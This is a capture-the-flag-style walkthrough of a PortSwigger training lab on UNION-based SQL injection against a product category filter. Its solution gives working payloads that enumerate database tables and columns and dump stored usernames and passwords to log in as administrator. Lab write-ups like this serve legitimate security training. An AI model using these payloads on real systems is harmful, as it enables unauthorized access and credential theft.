---
difficulty: Practitioner
solve_date: 2023-09-01
lab_url: https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle
---
### Description

This lab contains a [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

To solve the lab, log in as the `administrator` user.

### Solution

1. Browse to the url with the category filter
2. Replace the category parameter value with the SQLi payload `' UNION SELECT table_name, NULL from information_schema.tables -- -`. You should see a list of all table names in the DB.
3. The table called `users_bzbwea` looks promising... replace the category parameter value with the SQLi payload `' UNION SELECT column_name, NULL from information_schema.columns WHERE table_name = 'users_bzbwea' -- -`. Now, you should see a list of all column names in the users table.
4. Now, let's list the usernames/passwords in the table. Enter another SQLi query: `' UNION SELECT username_cebylh, password_kmntoc FROM users_bzbwea -- -`
5. Finally, login with the administrator credentials that were revealed.
